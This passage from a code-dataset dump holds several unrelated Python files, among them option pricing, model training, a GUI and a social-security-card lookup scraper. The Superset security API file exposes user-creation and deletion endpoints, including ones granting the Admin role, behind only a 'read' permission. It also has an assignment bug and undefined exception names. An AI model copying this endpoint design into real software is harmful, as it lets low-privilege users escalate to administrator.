See the License for the\n# specific language governing permissions and limitations\n# under the License.\nimport logging\n#import json\n\nfrom flask import Response, request\nfrom flask_appbuilder import expose\nfrom flask_appbuilder.api import BaseApi, safe\nfrom flask_appbuilder.security.decorators import permission_name, protect\nfrom flask_appbuilder.security.sqla.models import PermissionView\nfrom flask_wtf.csrf import generate_csrf\n\nfrom superset import security_manager as sm\nfrom superset.extensions import event_logger\n\nlogger = logging.getLogger(__name__)\n\nclass SecurityRestApi(BaseApi):\n resource_name = \"security\"\n allow_browser_login = True\n openapi_spec_tag = \"Security\"\n\n @expose(\"/csrf_token/\", methods=[\"GET\"])\n @event_logger.log_this\n @protect()\n @safe\n @permission_name(\"read\")\n def csrf_token(self) -> Response:\n \"\"\"\n Return the csrf token\n ---\n get:\n description: >-\n Fetch the CSRF token\n responses:\n 200:\n description: Result contains the CSRF token\n content:\n application/json:\n schema:\n type: object\n properties:\n result:\n type: string\n 401:\n $ref: '#/components/responses/401'\n 500:\n $ref: '#/components/responses/500'\n \"\"\"\n return self.response(200, result=generate_csrf())\n\n def custom_pvm_check(self, pvm: PermissionView, perm_name: str) -> bool:\n return str(pvm) == perm_name\n\n \n def create_role(self, role_name, datasourceIds, datasourceNames, isUser) -> None:\n pns = []\n for idx, id in enumerate(datasourceIds):\n pns.append('datasource access on [Tracking].[' + datasourceNames[idx] + '](id:' + id + ')')\n\n if isUser:\n pns.append('can write on Dataset')\n pns.append('can read on Dataset')\n pns.append('menu access on Dataset')\n pns.append('can save on Datasource')\n\n role = sm.add_role(role_name)\n pvms = sm.get_session.query(PermissionView).all()\n\n role.permissions = []\n for permission_view in pvms:\n for perm_name in pns:\n if self.custom_pvm_check(permission_view, perm_name):\n role.permissions.append(permission_view)\n break\n\n sm.get_session.merge(role)\n sm.get_session.commit()\n\n\n @expose(\"/create_ta_user/\", methods=[\"POST\"])\n @event_logger.log_this\n @protect()\n @safe\n @permission_name(\"read\")\n def ta_user_creation(self) -> Response:\n \"\"\"\n Return the csrf token\n ---\n get:\n description: >-\n Fetch the CSRF token\n responses:\n 200:\n description: Result contains the CSRF token\n content:\n application/json:\n schema:\n type: object\n properties:\n result:\n type: string\n 401:\n $ref: '#/components/responses/401'\n 500:\n $ref: '#/components/responses/500'\n \"\"\"\n data = request.json\n role_name = ''\n\n # admin, user, sub\n if data['type'] == 'admin':\n role_name = 'Admin'\n elif data['type'] == 'user':\n role_name = data['key']\n elif data['type'] == 'sub':\n role_name = data['key'] + '_sub'\n\n role = sm.find_role(role_name)\n\n if role is None:\n datasourceIds = data['datasourceIds'].split(',')\n datasourceNames = data['datasourceNames'].split(',')\n isUser = data['type'] = 'user'\n self.create_role(role_name, datasourceIds, datasourceNames, isUser)\n \n role_names = [role_name]\n if role_name != 'Admin':\n role_names.append('Gamma')\n\n user = sm.add_user(data['username'], 'DS2G', \"User\", data['email'], list(map(lambda rn:sm.find_role(rn), role_names)), password=data['password'])\n sm.get_session.commit()\n return self.response(200, id=user.id)\n\n @expose(\"/delete_ta_user/\", methods=[\"POST\"]) #DELETE\n @event_logger.log_this\n @protect()\n @safe\n 
@permission_name(\"read\")\n def ta_user_deletion(self) -> Response:\n \"\"\"\n Return the csrf token\n ---\n get:\n description: >-\n Fetch the CSRF token\n responses:\n 200:\n description: Result contains the CSRF token\n content:\n application/json:\n schema:\n type: object\n properties:\n result:\n type: string\n 401:\n $ref: '#/components/responses/401'\n 500:\n $ref: '#/components/responses/500'\n \"\"\"\n data = request.json\n user = sm.find_user(data['username'])\n\n if user is not None:\n try:\n sm.get_session.delete(user)\n sm.get_session.commit()\n except SQLAlchemyError as ex: # pragma: no cover\n sm.get_session.rollback()\n raise DAODeleteFailedError(exception=ex)\n\n return self.response(200)","sub_path":"superset/security/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"489761206","text":"# # By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that the 6th prime is 13.\r\n# # What is the 10 001st prime number?\r\n\r\nimport math\r\ndef isprime(num):\r\n for i in range(3, math.floor(math.sqrt(num)) + 1, 2):\r\n if num % i == 0:\r\n return False\r\n return True\r\n\r\nn = 1\r\ncount = 1\r\nwhile(count != 10001):\r\n n += 2\r\n if isprime(n):\r\n count += 1\r\nprint(n)\r\n","sub_path":"Solutions/problem_7.py","file_name":"problem_7.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"349802524","text":"import time\nimport numpy as np\nimport torch\nfrom .utils.meters import AverageMeter\nfrom .utils.plot_figures import utils_for_fig3\nfrom .utils.mlp_statistics import precision_recall\nfrom .loss import CTAM_SSCL_Loss\nfrom .onlinesamplemining import DSM,KNN,SS\nimport pdb\ndevice_0 = torch.device('cuda:0')\ndevice_1 = torch.device('cuda:1')\ndevice_cpu = torch.device('cpu')\n\nclass Trainer(object):\n def __init__(self, cfg, model, memory,use_dram=False):\n super(Trainer, self).__init__()\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n self.model = model\n self.memory = memory\n self.use_dram = use_dram\n self.eval_mlp = True\n self.ldb = cfg.SSCL.L\n self.thr = cfg.SSCL.T\n\n self.criterion = CTAM_SSCL_Loss(temperature=cfg.SSCL.TEMP, base_temperature=cfg.SSCL.BTEMP,contrast_mode=cfg.SSCL.MODE).to(self.device)\n\n\n\n def train(self, epoch, data_loader, optimizer,writer,gi=True, print_freq=1):\n self.model.train()\n\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n end = time.time()\n\n\n\n if gi==True and epoch==0:\n print('Memory Re-initisliation')\n with torch.no_grad():\n for i, inputs in enumerate(data_loader):\n inputs,camid,tid,pids = self._parse_data(inputs)\n outputs = self.model(inputs, 'l2feat')\n self.memory.store(outputs,camid,tid,pids)\n #self.graph.global_normalisation()\n\n print('Done!')\n \n\n if epoch % 5 == 0 and epoch != 0:\n print('Look-up table Overhaul - [reinitialising]')\n with torch.no_grad():\n for i, inputs in enumerate(data_loader):\n inputs,camid,tid, pids = self._parse_data(inputs)\n outputs = self.model(inputs, 'l2feat')\n self.memory.store(outputs,camid,tid,pids)\n print('[Reinitilisaing] Overhaul (%.3f %%) is finished'%(i/len(data_loader)*100.0))\n #self.graph.global_normalisation()\n print('Dictionary overhaul is finished. 
- Overhaul (100%%) is finished')\n\n \n precision = 0.0\n recall = 0.0\n _num_positive = 0\n\n\n\n for i, inputs in enumerate(data_loader):\n if i!=0 and i%500==0:\n print('VGA Cooling for 120 secs')\n time.sleep(120)\n\n data_time.update(time.time() - end)\n inputs,camid,tid,pids = self._parse_data_v2(inputs)\n camid = camid.to(device_1)\n tid = tid.to(device_1)\n outputs = self.model(inputs, 'l2feat') #output = feature batch of input images\n #Batch output - so start on this section\n logits = self.memory(outputs, pids,epoch=epoch)\n if epoch > 5:\n #Local + global contrastive learnings\n #local_loss,_hard_pos = self.criterion(self.memory,logits,camid,hard_pos=None,trackids=tid,type='local')\n #global_loss,_tmp_pos = self.criterion(self.memory,logits,camid,hard_pos=_hard_pos,trackids=tid,type='cl',thr=self.thr)\n cl_loss,_ttt = self.criterion(self.memory,logits,camid,hard_pos=None,trackids=tid,type='cl')\n cam_kl_loss = self.criterion(self.memory,outputs.to(device_1),camid,hard_pos=None,type='cam')\n loss = cl_loss +self.ldb*cam_kl_loss\n #loss = local_loss + global_loss\n\n else:\n loss,_ = self.criterion(self.memory,logits,camid,trackids=tid,type='local')\n\n\n losses.update(loss.item(), outputs.size(0))\n writer.add_scalar(\"Loss/train\", loss.item(), epoch * len(data_loader)+i)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n batch_time.update(time.time() - end)\n end = time.time()\n\n if (i + 1) % print_freq == 0:\n log = \"Epoch: [{}][{}/{}], Time {:.3f} ({:.3f}), Data {:.3f} ({:.3f}), Loss {:.3f} ({:.3f}) \" \\\n .format(epoch, i + 1, len(data_loader),\n batch_time.val, batch_time.avg,\n data_time.val, data_time.avg,\n losses.val, losses.avg)\n print(log)\n torch.cuda.empty_cache()\n if epoch > 5:\n plog = \"[Epoch {}]Average # of positive {} Prediction {:.3f} Recall {:.3f}\".format(epoch, _num_positive/len(data_loader),precision/len(data_loader), recall/len(data_loader))\n print(plog)\n\n\n def _parse_data(self, inputs):\n imgs, _t1, camid,tid,pids = inputs #img, fname,camid, pid, idx\n inputs = imgs.to(self.device)\n pids = pids.to(self.device)\n #print(_t1)\n #print(_t2)\n return inputs,camid,tid, pids\n\n def _parse_data_v2(self, inputs):\n imgs, _t1,camid,tid, pids = inputs #img, fname,camid, pid, idx\n inputs = imgs.to(self.device)\n pids = pids.to(self.device)\n #print(_t1)\n #print(_t2)\n return inputs,camid,tid,pids\n","sub_path":"lib/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":5161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"403715004","text":"import os\nfrom tkinter import *\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom joblib import dump, load\nfrom tensorflow import keras\n\nFILENAME = \"Show.png\"\npca = load(os.path.join(os.curdir, \"Config\", 'Trained .joblib'))\n\nsliders = []\nmins = []\nmaxs = []\nk = []\n\nrow = 1\ncol = 1\ncol_count = 3\nrun = False\n\ndef lol():\n pass\nconfig_dir = os.path.join(os.curdir, \"Config\")\n\nautoencoder = keras.models.load_model(os.path.join(config_dir, \"Best Model.h5\"), custom_objects={\"rounded_accuracy\":lol})\ndecoder = autoencoder.layers[1]\n\n\ndef init():\n global mins, maxs\n with open(os.path.join(config_dir, \"Max.txt\"), \"r\") as max:\n with open(os.path.join(config_dir, \"Min.txt\"), \"r\") as min:\n\n for lin in max.readlines():\n maxs.append(float(lin))\n\n for lin in min.readlines():\n mins.append(float(lin))\n\n\ndef show_img():\n global FILENAME, sliders, pca\n img = []\n for index in 
range(len(sliders)):\n img.append(sliders[index].get()/10 * (maxs[index] - mins[index]))\n\n img = pca.inverse_transform([img])\n img = decoder.predict(img).reshape((64, 64, 3))\n\n\n plt.imshow(img)\n plt.show()\n\n\nclass SliderWindows:\n def __init__(self, master):\n global row, col\n self.master = master\n self.windows = []\n self.app = 0\n\n if col_count % 2 == 0:\n self.button = Button(master, text='Show Image', command=show_img).grid(row=0,\n column=int(col_count / 2))\n else:\n self.button = Button(master, text='Show Image', command=show_img).grid(row=0,\n column=int(col_count / 2) + 1)\n\n for x in range(33):\n w = Scale(master, from_=-10, to=10, length=None, orient=HORIZONTAL)\n w.grid(row=row, column=col)\n sliders.append(w)\n\n if col == col_count:\n col = 0\n row += 1\n col += 1\n\n\ndef main():\n root = Tk()\n root.title(\"GUI\")\n init()\n\n app = SliderWindows(root)\n\n root.mainloop()\n\n\nmain()\n","sub_path":"GUI/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"111993723","text":"import requests\n\n\ndef test_knowledge_grounding():\n url = \"http://0.0.0.0:8083/respond\"\n\n checked_sentence1 = (\n \"When Mabel visited their home to play the piano, \"\n \"she occasionally glimpsed a flitting swirl of white in the next room, \"\n \"sometimes even received a note of thanks for calling, but she never actually \"\n \"spoke with the reclusive, almost spectral Emily.\"\n )\n knowledge1 = (\n \"The real-life soap opera behind the publication of Emily Dickinson’s poems\\n\"\n \"When Mabel visited their home to play the piano, she occasionally glimpsed \"\n \"a flitting swirl of white in the next room, sometimes even received a note of \"\n \"thanks for calling, but she never actually spoke with the reclusive, almost spectral Emily.\"\n )\n text1 = \"Yeah she was an icon she died in 1886 at the tender age of 55.\"\n\n checked_sentence2 = \"Penguins are a group of aquatic flightless birds.\"\n knowledge2 = \"Penguins are a group of aquatic flightless birds.\"\n text2 = \"Who are penguins?\"\n\n history = (\n \"Do you know who Emily Dickson is?\\n\"\n 'Emily Dickinson? The poet? I do! \"Tell all the truth, but tell it slant\" '\n \"she once said. 
Do you like her poetry?\"\n )\n\n request_data = {\n \"batch\": [\n {\"checked_sentence\": checked_sentence1, \"knowledge\": knowledge1, \"text\": text1, \"history\": history},\n {\"checked_sentence\": checked_sentence2, \"knowledge\": knowledge2, \"text\": text2, \"history\": history},\n ]\n }\n results = requests.post(url, json=request_data).json()\n assert all(results), f\"Got empty string among results\"\n print(\"Got\\n{}\\nSuccess\".format(results))\n\n\nif __name__ == \"__main__\":\n test_knowledge_grounding()\n","sub_path":"services/knowledge_grounding/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"405312201","text":"#coding = utf-8\n\nimport re\nimport tkinter\nimport requests\nimport xlwt\nimport time\nimport logging\nfrom tkinter.scrolledtext import ScrolledText\nfrom tkinter import messagebox\nfrom tkinter import filedialog\nfrom concurrent.futures import ThreadPoolExecutor, wait\n\n\nclass CardInfo(object):\n\n def __init__(self):\n self.root = tkinter.Tk()\n self.root.title(\"泸州社保卡制卡查询(测试版1.1) 作者:yangyi\")\n self.root.resizable(0,0)\n self.root.minsize(1200,600)\n logging.basicConfig(filename='log.log', level=logging.DEBUG)\n logging.info('Init...')\n\n self.frame1 = tkinter.LabelFrame(self.root,\n padx=10, pady=10,\n text='输入身份证号码',\n font=(\"Arial, 15\"),\n width=250,\n height=600)\n self.frame1.grid(row=0, column=0)\n self.frame2 = tkinter.LabelFrame(self.root,\n padx=10, pady=10,\n text='身份证号码',\n font=(\"Arial, 15\"),\n width=250,\n height=600)\n self.frame2.grid(row=0, column=1)\n self.frame3 = tkinter.LabelFrame(self.root,\n padx=10, pady=10,\n text='社保卡信息',\n font=(\"Arial, 15\"),\n width=700,\n height=600)\n self.frame3.grid(row=0, column=2)\n\n self.inputText1 = ScrolledText(self.frame1, width=30, height=42)\n self.inputText2 = ScrolledText(self.frame2, width=30, height=42, state='disabled')\n self.inputText3 = ScrolledText(self.frame3, width=95, height=42, state='disabled')\n self.inputText1.grid(row=0, column=0)\n self.inputText2.grid(row=0, column=0)\n self.inputText3.grid(row=0, column=0)\n\n self.inputButton1 = tkinter.Button(self.frame1, text=\"导入\", font=(\"Arial, 15\"), command=self.input)\n self.inputButton2 = tkinter.Button(self.frame2, text=\"查询\", font=(\"Arial, 15\"), state='disabled', command=self.search)\n self.inputButton3 = tkinter.Button(self.frame3, text=\"导出\", font=(\"Arial, 15\"), state='disabled', command=self.output)\n self.inputButton1.grid(row=1, column=0)\n self.inputButton2.grid(row=1, column=0)\n self.inputButton3.grid(row=1, column=0)\n\n self.url = 'http://10.162.0.174:7777/servlet/CardServlet'\n self.headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'\n }\n\n # 点击导入按钮函数\n def input(self):\n cards = self.inputText1.get('0.0', tkinter.END)\n self.cardsList = []\n #根据长度判断是否身份证号码\n for val in cards.split():\n if val.isalnum() and len(val) == 18:\n self.cardsList.append(val)\n\n #将识别的身份证号码填入第二个框中\n if (self.cardsList):\n self.inputButton2['state'] = tkinter.NORMAL\n else:\n self.inputButton2['state'] = tkinter.DISABLED\n self.inputText2['state'] = tkinter.NORMAL\n self.inputText2.delete('0.0', tkinter.END) #全清空\n for index, item in enumerate(self.cardsList):\n self.inputText2.insert(tkinter.END, item + '\\n')\n\n self.inputText2['state'] = tkinter.DISABLED\n\n # 点击查询按钮函数\n def search(self):\n self.inputButton2['state'] 
= tkinter.DISABLED\n if not self.checkNet():\n messagebox.showerror('网络链接错误', '请检查网络链接,本程序需要连接内网或者外网')\n return\n t1 = time.clock()\n self.threadPool = ThreadPoolExecutor(max_workers=7)\n futures = []\n self.cardResult = []\n for cardNum in self.cardsList:\n futures.append(self.threadPool.submit(self.getCardInfo, cardNum))\n wait(futures)\n\n for cardFuture in futures:\n cardInfo = cardFuture.result()\n self.cardResult.append(cardInfo)\n print(time.clock() - t1)\n\n #在第三个文本框中显示查询结果\n self.inputText3['state'] = tkinter.NORMAL\n self.inputText3.delete('0.0', tkinter.END)\n self.inputText3.insert('0.0', '身份证号码\\t社保卡状态\\t银行网点\\t网点地址\\t网点电话\\n')\n for cardInfo in self.cardResult:\n if cardInfo.__contains__('bank'):\n self.inputText3.insert(tkinter.END, cardInfo['id'] + '\\t' + cardInfo['status'] + '\\t' + cardInfo['bank'] + '\\t' + cardInfo['address'] + '\\t' + cardInfo['tel'] + '\\n')\n else:\n self.inputText3.insert(tkinter.END, cardInfo['id'] + '\\t' + cardInfo['status'] + '\\n')\n self.inputText3['state'] = tkinter.DISABLED\n if self.cardsList:\n self.inputButton2['state'] = tkinter.NORMAL\n if self.cardResult:\n self.inputButton3['state'] = tkinter.NORMAL\n else:\n self.inputButton3['state'] = tkinter.DISABLED\n messagebox.showinfo('查询结束', \"查询结束,但由于网络原因,结果可能不准确,请将结果为:未制卡、网络错误的人员身份证再次输入程序进行查询,确保结果正确\")\n\n # 点击导出按钮函数\n def output(self):\n self.inputButton3['state'] = tkinter.DISABLED\n workBook = xlwt.Workbook()\n sheet1 = workBook.add_sheet('社保卡查询结果')\n sheet1.write(0, 0, '身份证号码')\n sheet1.write(0, 1, '社保卡状态')\n sheet1.write(0, 2, '领卡网点')\n sheet1.write(0, 3, '网点地址')\n sheet1.write(0, 4, '网点电话')\n\n for index, cardInfo in enumerate(self.cardResult):\n sheet1.write(index + 1, 0, cardInfo['id'])\n sheet1.write(index + 1, 1, cardInfo['status'])\n if cardInfo.__contains__('bank'):\n sheet1.write(index + 1, 2, cardInfo['bank'])\n sheet1.write(index + 1, 3, cardInfo['address'])\n sheet1.write(index + 1, 4, cardInfo['tel'])\n\n path = filedialog.asksaveasfilename()\n if path:\n workBook.save(path + '.xls')\n\n if self.cardResult:\n self.inputButton3['state'] = tkinter.NORMAL\n\n # 测试网络环境为内网还是外网\n def checkNet(self):\n try:\n requests.get('http://10.162.0.174:7777/search.jsp?method=000', headers=self.headers, timeout=2)\n except BaseException:\n self.url = 'http://182.130.246.34:8881/servlet/CardServlet'\n try:\n requests.get('http://182.130.246.34:8881/search.jsp?method=000', headers=self.headers, timeout=2)\n except BaseException as e:\n logging.exception(e)\n return False\n return True;\n\n def getCardInfo(self, cardNum):\n\n param = {\n 'card': cardNum,\n 'method': '000'\n }\n try:\n response = requests.post(self.url, headers=self.headers, data=param, timeout=2)\n result = {}\n result['id'] = cardNum\n if '提示' in response.text:\n result['status'] = '该人员还未办理社保卡,请尽快到社区或银行网点办理!'\n else:\n result['status'] = re.findall(r'社保卡状态(.+?)', response.text)[0]\n result['bank'] = re.findall(r'领卡网点(.+?)', response.text)[0]\n result['address'] = re.findall(r'网点地址(.+?)', response.text)[0]\n result['tel'] = re.findall(r'网点电话(.+?)', response.text)[0]\n return result;\n except BaseException as e:\n logging.exception(e)\n result = {}\n result['id'] = cardNum\n result['status'] = '网络状态不好,请重新查询'\n return result\n\ndef main():\n CI = CardInfo()\n try:\n tkinter.mainloop()\n except BaseException as e:\n logging.exception(e)\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"social_card/main_current.py","file_name":"main_current.py","file_ext":"py","file_size_in_byte":8461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"277824569","text":"import QuantLib as ql\r\n\r\n# global data\r\ntodaysDate = ql.Date(15, ql.May, 1998)\r\nql.Settings.instance().evaluationDate = todaysDate\r\nsettlementDate = ql.Date(17, ql.May, 1998)\r\nriskFreeRate = ql.FlatForward(settlementDate, 0.05, ql.Actual365Fixed())\r\n\r\n# option parameters\r\nexercise = ql.EuropeanExercise(ql.Date(17, ql.May, 1999))\r\npayoff = ql.PlainVanillaPayoff(ql.Option.Call, 8.0)\r\n\r\n# market data\r\nunderlying = ql.SimpleQuote(7.0)\r\nvolatility = ql.BlackConstantVol(settlementDate, ql.TARGET(), 0.10, ql.Actual365Fixed())\r\ndividendYield = ql.FlatForward(settlementDate, 0.05, ql.Actual365Fixed())\r\n\r\n# report\r\nheader = \" |\".join([\"%17s\" % tag for tag in [\"method\", \"value\", \"estimated error\", \"actual error\"]])\r\nprint(\"\")\r\nprint(header)\r\nprint(\"-\" * len(header))\r\n\r\nrefValue = None\r\n\r\n\r\ndef report(method, x, dx=None):\r\n e = \"%.4f\" % abs(x - refValue)\r\n x = \"%.5f\" % x\r\n if dx:\r\n dx = \"%.4f\" % dx\r\n else:\r\n dx = \"n/a\"\r\n print(\" |\".join([\"%17s\" % y for y in [method, x, dx, e]]))\r\n\r\n\r\n# good to go\r\n\r\nprocess = ql.BlackScholesMertonProcess(\r\n ql.QuoteHandle(underlying),\r\n ql.YieldTermStructureHandle(dividendYield),\r\n ql.YieldTermStructureHandle(riskFreeRate),\r\n ql.BlackVolTermStructureHandle(volatility),\r\n)\r\n\r\nhestonProcess = ql.HestonProcess(\r\n ql.YieldTermStructureHandle(riskFreeRate),\r\n ql.YieldTermStructureHandle(dividendYield),\r\n ql.QuoteHandle(underlying),\r\n 0.1 * 0.1,\r\n 1.0,\r\n 0.1 * 0.1,\r\n 0.0001,\r\n 0.0,\r\n)\r\nhestonModel = ql.HestonModel(hestonProcess)\r\n\r\noption = ql.VanillaOption(payoff, exercise)\r\n\r\n# method: analytic\r\noption.setPricingEngine(ql.AnalyticEuropeanEngine(process))\r\nvalue = option.NPV()\r\nrefValue = value\r\nreport(\"analytic\", value)\r\n\r\n# method: Heston semi-analytic\r\noption.setPricingEngine(ql.AnalyticHestonEngine(hestonModel))\r\nreport(\"Heston analytic\", option.NPV())\r\n\r\n# method: Heston COS method\r\noption.setPricingEngine(ql.COSHestonEngine(hestonModel))\r\nreport(\"Heston COS Method\", option.NPV())\r\n\r\n# method: integral\r\noption.setPricingEngine(ql.IntegralEngine(process))\r\nreport(\"integral\", option.NPV())\r\n\r\n# method: finite differences\r\ntimeSteps = 801\r\ngridPoints = 800\r\n\r\noption.setPricingEngine(ql.FDEuropeanEngine(process, timeSteps, gridPoints))\r\nreport(\"finite diff.\", option.NPV())\r\n\r\n# method: binomial\r\ntimeSteps = 801\r\n\r\noption.setPricingEngine(ql.BinomialVanillaEngine(process, \"JR\", timeSteps))\r\nreport(\"binomial (JR)\", option.NPV())\r\n\r\noption.setPricingEngine(ql.BinomialVanillaEngine(process, \"CRR\", timeSteps))\r\nreport(\"binomial (CRR)\", option.NPV())\r\n\r\noption.setPricingEngine(ql.BinomialVanillaEngine(process, \"EQP\", timeSteps))\r\nreport(\"binomial (EQP)\", option.NPV())\r\n\r\noption.setPricingEngine(ql.BinomialVanillaEngine(process, \"Trigeorgis\", timeSteps))\r\nreport(\"bin. 
(Trigeorgis)\", option.NPV())\r\n\r\noption.setPricingEngine(ql.BinomialVanillaEngine(process, \"Tian\", timeSteps))\r\nreport(\"binomial (Tian)\", option.NPV())\r\n\r\noption.setPricingEngine(ql.BinomialVanillaEngine(process, \"LR\", timeSteps))\r\nreport(\"binomial (LR)\", option.NPV())\r\n\r\noption.setPricingEngine(ql.BinomialVanillaEngine(process, \"Joshi4\", timeSteps))\r\nreport(\"binomial (Joshi)\", option.NPV())\r\n\r\n# method: finite differences\r\n# not yet implemented\r\n\r\n# method: Monte Carlo\r\noption.setPricingEngine(ql.MCEuropeanEngine(process, \"pseudorandom\", timeSteps=1, requiredTolerance=0.02, seed=42))\r\nreport(\"MC (crude)\", option.NPV(), option.errorEstimate())\r\n\r\noption.setPricingEngine(ql.MCEuropeanEngine(process, \"lowdiscrepancy\", timeSteps=1, requiredSamples=32768))\r\nreport(\"MC (Sobol)\", option.NPV())\r\n","sub_path":"European Option - QuantLib.py","file_name":"European Option - QuantLib.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"313088137","text":"import csv\r\nimport cv2\r\nimport math\r\nimport numpy as np\r\nfrom PIL import Image \r\nimport matplotlib.pyplot as plt\r\nfrom os import getcwd\r\n\r\n\r\nfrom sklearn.utils import shuffle\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\nfrom keras.models import Sequential, model_from_json\r\nfrom keras.layers import Flatten, Dense, Lambda, Dropout, Activation\r\nfrom keras.layers import Convolution2D, MaxPooling2D, Cropping2D\r\nfrom keras.regularizers import l2, activity_l2\r\nfrom keras.optimizers import Adam\r\nfrom keras.callbacks import ModelCheckpoint, Callback\r\n\r\nimport tensorflow as tf\r\ntf.python.control_flow_ops = tf\r\n\r\nfrom keras import models, optimizers, backend\r\nfrom keras.layers import core, convolutional, pooling\r\nfrom sklearn import model_selection\r\n\r\n\r\ndef preprocessing_image(img):\r\n \r\n new_img = cv2.GaussianBlur(img, (3,3), 0)\r\n\r\n new_img = cv2.cvtColor(new_img, cv2.COLOR_BGR2RGB)\r\n return new_img\r\n\r\ndef random_distort(img, angle):\r\n ''' \r\n random distortion to dataset images\r\n '''\r\n new_img = img.astype(float)\r\n # random brightness \r\n value = np.random.randint(-28, 28)\r\n if value > 0:\r\n mask = (new_img[:,:,0] + value) > 255 \r\n if value <= 0:\r\n mask = (new_img[:,:,0] + value) < 0\r\n new_img[:,:,0] += np.where(mask, 0, value)\r\n # random shadow \r\n h,w = new_img.shape[0:2]\r\n mid = np.random.randint(0,w)\r\n factor = np.random.uniform(0.6,0.8)\r\n if np.random.rand() > .5:\r\n new_img[:,0:mid,0] *= factor\r\n else:\r\n new_img[:,mid:w,0] *= factor\r\n # randomly shift horizon\r\n h,w,_ = new_img.shape\r\n horizon = 2*h/5\r\n v_shift = np.random.randint(-h/8,h/8)\r\n pts1 = np.float32([[0,horizon],[w,horizon],[0,h],[w,h]])\r\n pts2 = np.float32([[0,horizon+v_shift],[w,horizon+v_shift],[0,h],[w,h]])\r\n M = cv2.getPerspectiveTransform(pts1,pts2)\r\n new_img = cv2.warpPerspective(new_img,M,(w,h), borderMode=cv2.BORDER_REPLICATE)\r\n return (new_img.astype(np.uint8), angle)\t\r\n\t\r\n\r\ndef generate_training_data(images, angles, batch_size=128, validation_flag=False):\r\n '''\r\n method for the model training data generator to process, distort, and load images, in order to feed the model. 
\r\n '''\r\n images, angles = shuffle(images, angles)\r\n X,y = ([],[])\r\n while True: \r\n for i in range(len(angles)):\r\n img = images[i] \t\t\t\r\n angle = angles[i]\r\n img = preprocessing_image(img)\r\n if not validation_flag:\r\n img, angle = random_distort(img, angle)\r\n X.append(img)\r\n y.append(angle)\r\n if len(X) == batch_size:\r\n yield (np.array(X), np.array(y))\r\n X, y = ([],[])\r\n images, angles = shuffle(images, angles)\r\n # flipping, if steering angle is higher than 0.3\r\n if abs(angle) > 0.3:\r\n img = cv2.flip(img, 1)\r\n angle *= -1\r\n X.append(img)\r\n y.append(angle)\r\n if len(X) == batch_size:\r\n yield (np.array(X), np.array(y))\r\n X, y = ([],[])\r\n images, angles = shuffle(images, angles)\r\n\r\n\t\t\t\t\t\r\n\r\n\t\t\t\t\t\r\nlines = []\r\nwith open('./data/driving_log.csv') as csvfile: \r\n reader = csv.reader(csvfile)\r\n for line in reader:\r\n lines.append(line)\r\n \r\n \r\n \r\nimages = []\r\nmeasurements = []\r\nfor line in lines:\r\n source_path = line[0] \r\n filename = source_path.split('/')[-1]\r\n current_path = './data/IMG/' + filename\r\n image = cv2.imread(current_path) \r\n images.append(image) \r\n measurement = float(line[3])\r\n measurements.append(measurement)\r\n \r\nX_train = np.array(images)\r\ny_train = np.array(measurements) \r\n\r\n# split into train/test sets\r\nimage_train, image_test, angles_train, angles_test = train_test_split(X_train, y_train, test_size=0.05, random_state=43) \r\n\r\nprint('Train set:', image_train.shape, angles_train.shape)\r\nprint('Test set:', image_test.shape, angles_test.shape)\r\n\r\n###### ConvNet Structure ######\r\n\r\nmodel = Sequential()\r\n\r\n# Normalize\r\nmodel.add(Lambda(lambda x: x / 255.0 - 0.5, input_shape = (160,320,3)))\r\n\r\n# Cropping images\r\nmodel.add(Cropping2D(cropping=((70,25), (60,60))))\r\n\r\n# Add three 5x5 convolution layers (output depth 24, 36, and 48), each with 2x2 stride\r\nmodel.add(Convolution2D(24, 5, 5, subsample = (2,2), activation = \"relu\"))\r\nmodel.add(Convolution2D(36, 5, 5, subsample = (2,2), activation = \"relu\"))\r\nmodel.add(Convolution2D(48, 5, 5, subsample = (2,2), activation = \"relu\"))\r\n\r\n\r\n# Add two 3x3 convolution layers (output depth 64, and 64)\r\nmodel.add(Convolution2D(64, 3, 3, activation = \"relu\"))\r\nmodel.add(Convolution2D(64, 3, 3, activation = \"relu\"))\r\n\r\n# Add a flatten layer\r\nmodel.add(Flatten())\r\n\r\n# Add three fully connected layers (depth 100, 50, 10) and regularizations\r\nmodel.add(Dense(100, W_regularizer=l2(0.00001)))\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dense(50, W_regularizer=l2(0.00001)))\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dense(10, W_regularizer=l2(0.00001)))\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dense(1, W_regularizer=l2(0.00001)))\r\n\r\nmodel.compile(loss = 'mse', optimizer =optimizers.Adam(lr=1e-04))\r\n\r\n# Generators\r\ntrain_gen = generate_training_data(image_train, angles_train, validation_flag=False, batch_size=64)\r\nval_gen = generate_training_data(image_train, angles_train, validation_flag=True, batch_size=64)\r\n#test_gen = generate_training_data(image_test, angles_test, validation_flag=True, batch_size=64)\r\n\r\ncheckpoint = ModelCheckpoint('model{epoch:02d}.h5')\r\n\r\nhistory = model.fit_generator(train_gen, 